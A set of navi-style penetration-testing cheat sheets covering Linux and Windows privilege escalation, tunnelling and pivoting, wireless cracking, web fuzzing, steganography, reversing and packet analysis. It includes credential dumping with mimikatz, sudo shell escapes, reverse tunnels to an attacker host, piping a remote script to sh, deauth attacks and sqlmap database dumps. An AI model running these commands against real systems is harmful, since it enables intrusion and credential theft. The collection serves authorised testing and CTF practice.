$ key_id: gpg --list-keys --keyid-format SHORT 2>/dev/null | grep -E "^pub" | awk '{print $2}' | cut -d'/' -f2
$ recipient_email: echo ""
$ file: find . -type f -maxdepth 1 2>/dev/null | head -20
$ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -v lo
$ mount_point: echo "/mnt/veracrypt"
$ public_key: echo "age1..."

71
privesc-linux.cheat Normal file
View file

@ -0,0 +1,71 @@
% privesc, linux, escalation
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null
# Check sudo permissions
sudo -l
# Find writable directories
find / -writable -type d 2>/dev/null
# Find world-writable files
find / -perm -o+w -type f 2>/dev/null
# Check cron jobs
cat /etc/crontab
ls -la /etc/cron*
crontab -l
# Find capabilities
getcap -r / 2>/dev/null
# Check for docker group
id | grep docker
# Check kernel version (for exploits)
uname -a
# Check OS version
cat /etc/os-release
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -t
# Check passwd file writable
ls -la /etc/passwd
# Check shadow file readable
ls -la /etc/shadow
# Find password files
find / -name "*.txt" -exec grep -l "password" {} \; 2>/dev/null
# Check NFS exports (no_root_squash)
cat /etc/exports
# Find SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
# Check PATH hijacking
echo $PATH
ls -la /usr/local/bin
# GTFOBins sudo bypass - vim
sudo vim -c ':!/bin/sh'
# GTFOBins sudo bypass - find
sudo find . -exec /bin/sh \; -quit
# GTFOBins sudo bypass - awk
sudo awk 'BEGIN {system("/bin/sh")}'
# GTFOBins SUID - python
./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

83
privesc-windows.cheat Normal file
View file

@ -0,0 +1,83 @@
% privesc, windows, escalation
# System info
systeminfo
# Current user privileges
whoami /priv
# Current user groups
whoami /groups
# All users
net user
# User details
net user <username>
# Local groups
net localgroup
# Administrators group
net localgroup administrators
# Running services
wmic service list brief
# Installed patches
wmic qfe list
# Scheduled tasks
schtasks /query /fo LIST /v
# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"
# Find writable service directories
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
# AlwaysInstallElevated check
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Stored credentials
cmdkey /list
# SAM and SYSTEM backup
dir C:\Windows\Repair\SAM
dir C:\Windows\System32\config\RegBack\SAM
# PowerUp
Import-Module .\PowerUp.ps1; Invoke-AllChecks
# WinPEAS
.\winPEASany.exe
# Juicy Potato (SeImpersonate)
.\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\shell.exe" -t *
# PrintSpoofer (SeImpersonate)
.\PrintSpoofer.exe -i -c cmd
# GodPotato (SeImpersonate)
.\GodPotato.exe -cmd "cmd /c whoami"
# Search for passwords in files
findstr /si password *.txt *.ini *.config
# Search registry for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
# Check saved WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="<wifi_name>" key=clear
# Dump SAM with mimikatz
mimikatz.exe "privilege::debug" "lsadump::sam" "exit"
# Dump credentials with mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
$ username: echo ""
$ wifi_name: echo ""

127
reversing.cheat Normal file
View file

@ -0,0 +1,127 @@
% reversing, reverse-engineering, ghidra, radare2, gdb, binary
# Ghidra - start GUI
ghidraRun
# Ghidra - analyze headless
analyzeHeadless <project_dir> <project_name> -import <binary> -postScript <script>
# radare2 - open binary
r2 <binary>
# radare2 - analyze all
r2 -A <binary>
# radare2 - analyze and open
r2 -AA <binary>
# r2 commands (inside r2):
# aaa - analyze all
# afl - list functions
# pdf - print disassembly of function
# s main - seek to main
# VV - visual graph mode
# px 100 - print hex
# iz - list strings in data section
# ii - list imports
# ie - list entry points
# radare2 - list functions
r2 -qc 'aaa; afl' <binary>
# radare2 - list strings
r2 -qc 'iz' <binary>
# radare2 - disassemble main
r2 -qc 'aaa; s main; pdf' <binary>
# GDB - start debugging
gdb <binary>
# GDB - run with args
gdb --args <binary> <arg1> <arg2>
# GDB commands:
# r - run
# b main - breakpoint at main
# b *0x401000 - breakpoint at address
# c - continue
# n - next (step over)
# s - step (step into)
# p $eax - print register
# x/10x $esp - examine memory
# info reg - show registers
# disas - disassemble current function
# bt - backtrace
# q - quit
# GDB with pwndbg/gef (enhanced)
gdb -q <binary>
# objdump - disassemble
objdump -d <binary>
# objdump - all headers
objdump -x <binary>
# objdump - disassemble with source
objdump -S <binary>
# readelf - file header
readelf -h <binary>
# readelf - sections
readelf -S <binary>
# readelf - symbols
readelf -s <binary>
# readelf - program headers
readelf -l <binary>
# nm - list symbols
nm <binary>
# nm - dynamic symbols
nm -D <binary>
# strings - extract strings
strings <binary>
strings -n 10 <binary>
# file - identify binary type
file <binary>
# ldd - list shared libraries
ldd <binary>
# strace - trace syscalls
strace <binary>
strace -f <binary>
# ltrace - trace library calls
ltrace <binary>
# Cutter - r2 GUI
cutter <binary>
# Binary Ninja (commercial)
binaryninja <binary>
# IDA Free
ida64 <binary>
# checksec - binary protections
checksec --file=<binary>
# ROPgadget - find gadgets
ROPgadget --binary <binary>
# pwntools (Python)
# from pwn import *
# elf = ELF('<binary>')
$ binary: find . -type f -executable 2>/dev/null | head -10
$ project_dir: echo "/tmp/ghidra_projects"
$ project_name: echo "analysis"
$ script: echo ""

129
secure-comms.cheat Normal file
View file

@ -0,0 +1,129 @@
% comms, signal, matrix, encrypted, messaging
# Signal CLI - register
signal-cli -u <phone_number> register
# Signal CLI - verify
signal-cli -u <phone_number> verify <code>
# Signal CLI - send message
signal-cli -u <phone_number> send -m "<message>" <recipient>
# Signal CLI - send to group
signal-cli -u <phone_number> send -m "<message>" -g <group_id>
# Signal CLI - receive messages
signal-cli -u <phone_number> receive
# Signal CLI - list groups
signal-cli -u <phone_number> listGroups
# Signal CLI - create group
signal-cli -u <phone_number> createGroup -n "<group_name>" -m <member1> <member2>
# Signal CLI - daemon mode
signal-cli -u <phone_number> daemon
# Matrix - login with element-cli
element-cli login <homeserver> <username> <password>
# Matrix - send message (Python SDK)
# pip install matrix-nio
# See nio documentation
# Matrix CLI - gomuks (TUI client)
gomuks
# Matrix CLI - matrixcli
matrixcli -s <homeserver> -u <username> send <room_id> "<message>"
# SimpleX Chat - start
simplex-chat
# Briar - desktop
briar-desktop
# Session messenger
session-desktop
# Keybase - login
keybase login
# Keybase - send message
keybase chat send <username> "<message>"
# Keybase - encrypt file
keybase encrypt <username> -i <input_file> -o <output_file>
# Keybase - decrypt file
keybase decrypt -i <input_file> -o <output_file>
# Keybase - sign file
keybase sign -i <input_file> -o <output_file.sig>
# Keybase - verify signature
keybase verify -i <file.sig>
# GPG - encrypt for recipient
gpg -e -r <recipient> <file>
# GPG - sign and encrypt
gpg -se -r <recipient> <file>
# GPG - decrypt
gpg -d <file.gpg>
# age - encrypt for recipient
age -r <public_key> -o <output.age> <input_file>
# age - encrypt with passphrase
age -p -o <output.age> <input_file>
# age - decrypt
age -d -i <key_file> -o <output> <input.age>
# OnionShare - share files over Tor
onionshare-cli <file>
# OnionShare - receive files
onionshare-cli --receive
# OnionShare - chat
onionshare-cli --chat
# Magic Wormhole - send file
wormhole send <file>
# Magic Wormhole - receive
wormhole receive <code>
# Croc - send file
croc send <file>
# Croc - receive
croc <code>
# XMPP with profanity
profanity
# IRC with weechat (+ OTR)
weechat
# Ricochet Refresh (Tor messenger)
ricochet-refresh
$ phone_number: echo "+1234567890"
$ recipient: echo "+1234567890"
$ code: echo ""
$ message: echo ""
$ group_id: echo ""
$ group_name: echo ""
$ homeserver: echo "https://matrix.org"
$ username: echo ""
$ password: echo ""
$ room_id: echo ""
$ public_key: echo "age1..."
$ key_file: echo "key.txt"
$ input_file: find . -type f 2>/dev/null | head -10
$ output_file: echo "encrypted"
$ file: find . -type f 2>/dev/null | head -10

129
solidity.cheat Normal file
View file

@ -0,0 +1,129 @@
% solidity, audit, smartcontract, ethereum, foundry
# Foundry - create new project
forge init <project_name>
# Foundry - build/compile
forge build
# Foundry - run tests
forge test
# Foundry - run tests verbose
forge test -vvvv
# Foundry - run specific test
forge test --match-test <test_name>
# Foundry - gas report
forge test --gas-report
# Foundry - coverage
forge coverage
# Foundry - deploy contract
forge create <contract> --rpc-url <rpc_url> --private-key <private_key>
# Foundry - verify contract
forge verify-contract <address> <contract> --chain <chain_id>
# Cast - call read function
cast call <contract_address> "<function_sig>" --rpc-url <rpc_url>
# Cast - send transaction
cast send <contract_address> "<function_sig>" --rpc-url <rpc_url> --private-key <private_key>
# Cast - decode calldata
cast calldata-decode "<function_sig>" <calldata>
# Cast - get storage slot
cast storage <contract_address> <slot> --rpc-url <rpc_url>
# Cast - keccak256 hash
cast keccak "<text>"
# Cast - convert to wei
cast to-wei <amount> ether
# Cast - convert from wei
cast from-wei <amount>
# Slither - full analysis
slither <contract_or_dir>
# Slither - specific detectors
slither <contract> --detect <detector>
# Slither - print contract summary
slither <contract> --print contract-summary
# Slither - print function summary
slither <contract> --print function-summary
# Slither - print inheritance
slither <contract> --print inheritance-graph
# Slither - human summary
slither <contract> --print human-summary
# Slither - list detectors
slither --list-detectors
# Mythril - analyze contract
myth analyze <contract.sol>
# Mythril - analyze deployed contract
myth analyze --address <contract_address> --rpc <rpc_url>
# Mythril - execution timeout
myth analyze <contract.sol> --execution-timeout 300
# Echidna - fuzz testing
echidna <contract.sol> --contract <contract_name>
# Echidna - with config
echidna <contract.sol> --contract <contract_name> --config echidna.yaml
# Aderyn - static analysis (Rust-based, fast)
aderyn <contract_or_dir>
# Solhint - linter
solhint <contract.sol>
# Solhint - init config
solhint --init
# Common vulnerability patterns to check:
# - Reentrancy (external calls before state changes)
# - Integer overflow/underflow (pre-0.8.0)
# - Unchecked return values
# - Access control issues
# - Front-running susceptibility
# - Oracle manipulation
# - Flash loan attacks
# - Delegate call to untrusted contract
# Check for selfdestruct
grep -rn "selfdestruct\|suicide" <dir>
# Check for delegatecall
grep -rn "delegatecall" <dir>
# Check for tx.origin
grep -rn "tx.origin" <dir>
# Check for inline assembly
grep -rn "assembly" <dir>
$ project_name: echo "my_project"
$ contract: find . -name "*.sol" 2>/dev/null | head -10
$ contract_or_dir: echo "."
$ contract_address: echo "0x..."
$ rpc_url: echo "https://eth-mainnet.g.alchemy.com/v2/YOUR_KEY"
$ private_key: echo ""
$ function_sig: echo "balanceOf(address)"
$ test_name: echo "test"
$ detector: echo "reentrancy-eth\nreentrancy-no-eth\narbitrary-send\nsuicide\nuninitialized-storage"
$ chain_id: echo "1\n5\n137\n42161" --- --header "1=mainnet, 5=goerli, 137=polygon, 42161=arbitrum"
$ slot: echo "0"
$ dir: echo "src/"

117
steganography.cheat Normal file
View file

@ -0,0 +1,117 @@
% steganography, stego, hidden, ctf
# steghide - extract hidden data
steghide extract -sf <image>
# steghide - extract with password
steghide extract -sf <image> -p <password>
# steghide - embed data
steghide embed -cf <cover_image> -ef <secret_file>
# steghide - info about file
steghide info <image>
# stegseek - crack steghide password
stegseek <image> <wordlist>
# stegseek - without wordlist (rockyou default)
stegseek <image>
# zsteg - PNG/BMP analysis
zsteg <image>
# zsteg - all checks
zsteg -a <image>
# binwalk - scan for embedded files
binwalk <file>
# binwalk - extract embedded files
binwalk -e <file>
# binwalk - extract with matryoshka
binwalk -eM <file>
# foremost - file carving
foremost -i <file> -o <output_dir>
# exiftool - view all metadata
exiftool <file>
# exiftool - view specific tag
exiftool -Comment <file>
# strings - find hidden text
strings <file>
strings -n 10 <file>
# xxd - hex dump
xxd <file> | head -50
# Check file magic bytes
xxd -l 16 <file>
file <file>
# pngcheck - PNG structure
pngcheck -v <image>
# stegoveritas - multiple stego checks
stegoveritas <image>
# openstego - extract (GUI tool)
openstego extract -sf <image> -xd <output_dir>
# outguess - extract
outguess -r <image> <output_file>
# jsteg - JPEG steganography
jsteg reveal <image>
# Audio steganography - Audacity
# Open in Audacity, check spectrogram view
# Audio steganography - sonic-visualiser
sonic-visualiser <audio_file>
# LSB extraction with Python
# from PIL import Image
# img = Image.open('image.png')
# Extract least significant bits
# Check for appended data
# Compare file size to expected size
# Look for data after EOF marker
# SNOW - whitespace steganography
snow -C <text_file>
# stegsnow - extract from whitespace
stegsnow -C <text_file>
# PDF steganography - check streams
pdf-parser <pdf_file>
pdftotext <pdf_file>
# QR code extraction
zbarimg <image>
# Common CTF stego workflow:
# 1. file / xxd - identify type
# 2. exiftool - check metadata
# 3. strings - hidden text
# 4. binwalk - embedded files
# 5. steghide/stegseek - hidden data
# 6. zsteg - LSB for PNG
$ image: find . -name "*.jpg" -o -name "*.png" -o -name "*.bmp" 2>/dev/null | head -10
$ file: find . -type f 2>/dev/null | head -10
$ cover_image: find . -name "*.jpg" 2>/dev/null | head -5
$ secret_file: echo "secret.txt"
$ password: echo ""
$ wordlist: echo "/usr/share/wordlists/rockyou.txt"
$ output_dir: echo "extracted"
$ output_file: echo "output.txt"
$ text_file: find . -name "*.txt" 2>/dev/null | head -5
$ audio_file: find . -name "*.wav" -o -name "*.mp3" 2>/dev/null | head -5
$ pdf_file: find . -name "*.pdf" 2>/dev/null | head -5

114
tunnels.cheat Normal file
View file

@ -0,0 +1,114 @@
% tunnels, ssh, pivoting, portforward, proxy
# SSH local port forward
ssh -L <local_port>:<target_host>:<target_port> <user>@<jump_host>
# SSH remote port forward
ssh -R <remote_port>:<local_host>:<local_port> <user>@<remote_host>
# SSH dynamic SOCKS proxy
ssh -D <socks_port> <user>@<host>
# SSH with ProxyJump (bastion)
ssh -J <user>@<jump_host> <user>@<target_host>
# SSH tunnel background
ssh -fN -L <local_port>:<target_host>:<target_port> <user>@<jump_host>
# SSH reverse tunnel (callback)
ssh -fN -R <remote_port>:localhost:22 <user>@<attacker_host>
# Chisel server (on attacker)
chisel server -p <port> --reverse
# Chisel client reverse SOCKS
chisel client <attacker_ip>:<port> R:socks
# Chisel client port forward
chisel client <attacker_ip>:<port> R:<remote_port>:<target_host>:<target_port>
# Chisel client local forward
chisel client <server_ip>:<port> <local_port>:<target_host>:<target_port>
# Ligolo-ng proxy (attacker)
./proxy -selfcert
# Ligolo-ng agent (victim)
./agent -connect <attacker_ip>:11601 -ignore-cert
# Socat port forward
socat TCP-LISTEN:<local_port>,fork TCP:<target_host>:<target_port>
# Socat file transfer
# Receiver:
socat TCP-LISTEN:<port>,fork file:<output_file>,create
# Sender:
socat TCP:<target>:<port> file:<input_file>
# Netcat relay
nc -lvp <port1> | nc <target> <port2>
# Proxychains with nmap
proxychains nmap -sT -Pn <target>
# Proxychains any command
proxychains <command>
# Edit proxychains config
# /etc/proxychains4.conf
# socks5 127.0.0.1 1080
# WireGuard - generate keys
wg genkey | tee privatekey | wg pubkey > publickey
# WireGuard - quick up
wg-quick up <interface>
# WireGuard - quick down
wg-quick down <interface>
# WireGuard - show status
wg show
# sshuttle - VPN over SSH
sshuttle -r <user>@<host> <network_cidr>
# sshuttle - all traffic
sshuttle -r <user>@<host> 0/0
# Metasploit portfwd
# portfwd add -l <local> -p <remote_port> -r <target>
# Meterpreter autoroute
# run autoroute -s <subnet>
# plink (Windows SSH)
plink.exe -L <local_port>:<target>:<target_port> <user>@<host>
# netsh port forward (Windows)
netsh interface portproxy add v4tov4 listenport=<local_port> listenaddress=0.0.0.0 connectport=<target_port> connectaddress=<target_host>
# netsh show forwards
netsh interface portproxy show all
# netsh delete forward
netsh interface portproxy delete v4tov4 listenport=<local_port> listenaddress=0.0.0.0
$ local_port: echo "8080"
$ target_host: echo ""
$ target_port: echo "80"
$ user: echo ""
$ jump_host: echo ""
$ remote_host: echo ""
$ remote_port: echo "9999"
$ local_host: echo "127.0.0.1"
$ socks_port: echo "1080"
$ host: echo ""
$ attacker_ip: echo ""
$ attacker_host: echo ""
$ port: echo "8080"
$ server_ip: echo ""
$ network_cidr: echo "10.0.0.0/24"
$ interface: echo "wg0"
$ output_file: echo "received_file"
$ input_file: find . -type f 2>/dev/null | head -5

59
web.cheat Normal file
View file

@ -0,0 +1,59 @@
% web, webapp, burp, fuzzing
# Directory fuzzing with ffuf
ffuf -u http://<target>/FUZZ -w <wordlist>
# Directory fuzzing with extensions
ffuf -u http://<target>/FUZZ -w <wordlist> -e .php,.html,.txt,.bak
# Subdomain fuzzing
ffuf -u http://FUZZ.<domain> -w <wordlist> -H "Host: FUZZ.<domain>"
# POST parameter fuzzing
ffuf -u http://<target>/login -X POST -d "username=admin&password=FUZZ" -w <wordlist>
# Filter by status code
ffuf -u http://<target>/FUZZ -w <wordlist> -fc 404
# Filter by response size
ffuf -u http://<target>/FUZZ -w <wordlist> -fs 0
# Gobuster directory scan
gobuster dir -u http://<target> -w <wordlist>
# Gobuster with extensions
gobuster dir -u http://<target> -w <wordlist> -x php,html,txt
# Nikto scan
nikto -h http://<target>
# WhatWeb (technology detection)
whatweb http://<target>
# SQLMap basic
sqlmap -u "http://<target>/page.php?id=1" --batch
# SQLMap dump database
sqlmap -u "http://<target>/page.php?id=1" --dbs --batch
# SQLMap dump tables
sqlmap -u "http://<target>/page.php?id=1" -D <database> --tables --batch
# XSS test payload
<script>alert('XSS')</script>
# Curl with POST data
curl -X POST http://<target>/login -d "username=admin&password=test" -v
# Curl with cookies
curl http://<target> -b "session=<cookie>"
# Curl with headers
curl http://<target> -H "Authorization: Bearer <token>"
$ target: echo ""
$ domain: echo ""
$ wordlist: echo "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"
$ database: echo ""
$ cookie: echo ""
$ token: echo ""

89
wireless.cheat Normal file
View file

@ -0,0 +1,89 @@
% wireless, wifi, aircrack, wpa, hacking
# Check wireless interfaces
iwconfig
# Kill interfering processes
sudo airmon-ng check kill
# Start monitor mode
sudo airmon-ng start <interface>
# Stop monitor mode
sudo airmon-ng stop <monitor_interface>
# Scan for networks
sudo airodump-ng <monitor_interface>
# Target specific network (capture handshake)
sudo airodump-ng -c <channel> --bssid <bssid> -w <output_prefix> <monitor_interface>
# Deauth attack (force handshake)
sudo aireplay-ng -0 <count> -a <bssid> -c <client_mac> <monitor_interface>
# Deauth broadcast (all clients)
sudo aireplay-ng -0 <count> -a <bssid> <monitor_interface>
# Crack WPA/WPA2 handshake
aircrack-ng -w <wordlist> -b <bssid> <capture_file>
# Crack with hashcat (faster - convert first)
cap2hccapx <capture_file> output.hccapx
hashcat -m 22000 output.hccapx <wordlist>
# PMKID attack (no handshake needed)
sudo hcxdumptool -i <monitor_interface> -o pmkid.pcapng --enable_status=1
# Convert PMKID for hashcat
hcxpcapngtool -o hash.22000 pmkid.pcapng
hashcat -m 22000 hash.22000 <wordlist>
# Fake AP with hostapd-wpe
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
# WPS attack with reaver
sudo reaver -i <monitor_interface> -b <bssid> -vv
# WPS attack with bully
sudo bully -b <bssid> -c <channel> <monitor_interface>
# Pixie dust attack (WPS)
sudo reaver -i <monitor_interface> -b <bssid> -vv -K 1
# Wifite - automated attacks
sudo wifite
# Wifite - WPA only
sudo wifite --wpa
# Check if handshake captured
aircrack-ng <capture_file>
# Create wordlist from AP info
crunch 8 8 -t <ssid>%%%% -o custom_wordlist.txt
# Wash - find WPS enabled APs
sudo wash -i <monitor_interface>
# Fern WiFi Cracker (GUI)
sudo fern-wifi-cracker
# Kismet - wireless detection
kismet
# Show saved WiFi passwords (Linux)
sudo cat /etc/NetworkManager/system-connections/* | grep psk=
# Show saved WiFi passwords (Windows)
netsh wlan show profile name="<ssid>" key=clear
$ interface: iw dev | grep Interface | awk '{print $2}'
$ monitor_interface: iw dev | grep Interface | awk '{print $2}' | head -1
$ channel: echo "1\n6\n11"
$ bssid: echo ""
$ client_mac: echo ""
$ output_prefix: echo "capture"
$ capture_file: find . -name "*.cap" -o -name "*.pcap" 2>/dev/null
$ wordlist: echo "/usr/share/wordlists/rockyou.txt"
$ count: echo "5\n10\n0" --- --header "0=continuous"
$ ssid: echo ""

94
wireshark.cheat Normal file
View file

@ -0,0 +1,94 @@
% wireshark, tshark, tcpdump, packets, network-analysis
# Wireshark - open GUI
wireshark
# Wireshark - open specific file
wireshark <pcap_file>
# tshark - capture on interface
sudo tshark -i <interface>
# tshark - capture to file
sudo tshark -i <interface> -w <output_pcap>
# tshark - read pcap file
tshark -r <pcap_file>
# tshark - filter by IP
tshark -r <pcap_file> -Y "ip.addr == <ip>"
# tshark - filter by port
tshark -r <pcap_file> -Y "tcp.port == <port>"
# tshark - HTTP traffic only
tshark -r <pcap_file> -Y "http"
# tshark - DNS traffic only
tshark -r <pcap_file> -Y "dns"
# tshark - follow TCP stream
tshark -r <pcap_file> -z follow,tcp,ascii,<stream_number>
# tshark - extract HTTP objects
tshark -r <pcap_file> --export-objects http,<output_dir>
# tshark - show conversations
tshark -r <pcap_file> -z conv,tcp
# tshark - protocol hierarchy
tshark -r <pcap_file> -z io,phs
# tshark - credentials (basic)
tshark -r <pcap_file> -Y "http.authorization or ftp.request.command == USER or ftp.request.command == PASS"
# tcpdump - capture on interface
sudo tcpdump -i <interface>
# tcpdump - capture to file
sudo tcpdump -i <interface> -w <output_pcap>
# tcpdump - read pcap
tcpdump -r <pcap_file>
# tcpdump - filter by host
sudo tcpdump -i <interface> host <ip>
# tcpdump - filter by port
sudo tcpdump -i <interface> port <port>
# tcpdump - filter by network
sudo tcpdump -i <interface> net <network_cidr>
# tcpdump - verbose with hex
sudo tcpdump -i <interface> -XX -vv
# tcpdump - no DNS resolution
sudo tcpdump -i <interface> -n
# Common Wireshark display filters:
# ip.addr == 192.168.1.1
# tcp.port == 443
# http.request.method == "POST"
# dns.qry.name contains "evil"
# tcp.flags.syn == 1 and tcp.flags.ack == 0
# frame contains "password"
# ssl.handshake.type == 1
# Extract files from pcap with binwalk
binwalk -e <pcap_file>
# NetworkMiner (GUI) - extract artifacts
networkminer <pcap_file>
# Zeek - generate logs from pcap
zeek -r <pcap_file>
$ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -v lo
$ pcap_file: find . -name "*.pcap" -o -name "*.pcapng" 2>/dev/null
$ output_pcap: echo "capture.pcap"
$ ip: echo ""
$ port: echo "80\n443\n22\n21\n53"
$ network_cidr: echo "192.168.1.0/24"
$ stream_number: echo "0"
$ output_dir: echo "extracted"